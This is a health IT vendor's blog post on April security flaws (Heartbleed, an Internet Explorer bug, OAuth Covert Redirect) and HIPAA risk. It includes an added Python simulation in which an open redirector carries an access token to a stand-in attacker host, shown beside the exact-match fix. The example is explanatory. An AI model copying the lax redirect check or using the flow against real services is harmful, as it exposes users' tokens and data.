Three weeks ago Internet users were notified en masse that a security vulnerability had been discovered in OpenSSL, the widely used open-source cryptographic library that secures much of the web's traffic. The so-called Heartbleed bug, a flaw in OpenSSL's TLS heartbeat extension that lets a remote peer read chunks of a server's memory, forced healthcare IT vendors across the industry to perform internal forensic analyses to check whether PHI passing through vulnerable internal and external systems could have been exposed.
Just one week later Microsoft announced that it had discovered a serious security vulnerability in its Internet Explorer browser. The issue was so severe that it prompted the federal government to advise citizens to use another browser until the flaw had been patched. Once again, health IT vendors had to perform HIPAA-mandated security risk assessments to measure the severity and scope of the incident.
Keeping the April security-flaw theme going, just last week yet another vulnerability was disclosed in a mechanism that many people use every day. The "Covert Redirect" weakness affects OAuth, the open authorization standard behind the "log in with" buttons offered by such Internet titans as Facebook and Google. It is not a bug in a single piece of software, so there was no one patch to apply: when a provider validates a client's redirect_uri loosely (accepting any URL on a registered domain) and the client site hosts an open redirect, an attacker can steer the access token or authorization code to a server they control and use it to read the user's data or act on the user's behalf. Again, vendors in the healthcare space with user-facing portals had to perform the same assessments to determine whether customer PHI had been compromised.
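The following is an added example, not code from the original post or from QliqSOFT, showing the two halves of Covert Redirect in a simulated implicit-grant flow: a provider-side redirect_uri check that only matches the host, versus the exact-match check that closes the hole, plus a client-side open redirector that carries the token fragment to the attacker. All hostnames, client IDs, paths and the token value are constructed for the example.

```python
from urllib.parse import urlparse, parse_qs

# Constructed sample registration: the client "client-portal" registered one callback URI.
REGISTERED_REDIRECT_URIS = {
    "client-portal": {"https://portal.example-health.test/oauth/callback"},
}


def lax_redirect_ok(client_id: str, redirect_uri: str) -> bool:
    """Host-level match: accepts any HTTPS URL on a registered host.
    This is the lenient validation that Covert Redirect relies on."""
    candidate = urlparse(redirect_uri)
    return any(
        candidate.scheme == "https" and candidate.netloc == urlparse(allowed).netloc
        for allowed in REGISTERED_REDIRECT_URIS.get(client_id, ())
    )


def strict_redirect_ok(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison against the pre-registered URI, as RFC 6749
    section 3.1.2.2 calls for. No prefix, host or pattern matching."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, ())


def authorize(client_id: str, redirect_uri: str, validator, token: str = "tok_constructed"):
    """Minimal implicit-grant authorization endpoint. On success the browser is
    sent to redirect_uri with the access token in the URL fragment; otherwise None."""
    if not validator(client_id, redirect_uri):
        return None
    return f"{redirect_uri}#access_token={token}"


def follow_open_redirect(location: str) -> str:
    """Simulates the victim's browser landing on the client's open redirector
    /redirect?url=... which 302s to the given url. Browsers preserve the URL
    fragment across a redirect, so the token travels with it."""
    parts = urlparse(location)
    if parts.path != "/redirect":
        return location  # not the open redirector; the browser stays put
    target = parse_qs(parts.query).get("url", [None])[0]
    if target is None:
        return location
    return target + (f"#{parts.fragment}" if parts.fragment else "")


def run_covert_redirect(validator):
    """Attacker supplies the client's open redirector, pointed at their own host,
    as the redirect_uri. Returns the final URL the victim's browser ends at, or
    None if the provider refused the authorization request."""
    attacker_uri = "https://portal.example-health.test/redirect?url=https://attacker.test/collect"
    location = authorize("client-portal", attacker_uri, validator)
    if location is None:
        return None
    return follow_open_redirect(location)


if __name__ == "__main__":
    print("lax check   ->", run_covert_redirect(lax_redirect_ok))
    print("strict check->", run_covert_redirect(strict_redirect_ok))
```

With the host-level check the token ends up at attacker.test; with exact matching the provider rejects the request before any token is issued. The client-side fix, removing or allow-listing the open redirector, is independent of and complementary to the provider-side fix.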
It was certainly an April to remember for health IT security professionals. Aside from countless hours of remediation and forensic effort, these events should serve as a reminder of the risks associated with allowing a Business Associate to take custody of your patients' PHI. Business Associate Agreements can be signed, and vendor assessments can be performed, but at the end of the day, you are placing yourself at the mercy of your provider's security controls. And as the April security incidents have shown us, not even the vendors with the most painstaking security checks will be 100% secure.
Sometimes abstinence is the only means of prevention. Passing through the cloud avoids the Business Associate conundrum by never allowing your PHI to be stored in, or even passed through, a vendor's environment. How many assurance emails can you get from your IT vendors before it's enough?
A lifelong communicator, this Tennessee native got his start in broadcast news before branching out into public media, corporate, communications, digital advertising, and integrated marketing. Prior to joining QliqSOFT as the company's first marketing team member, Ben shared his talents with organizations that include the University of Alabama, iHeartMedia, and The Kroger Company.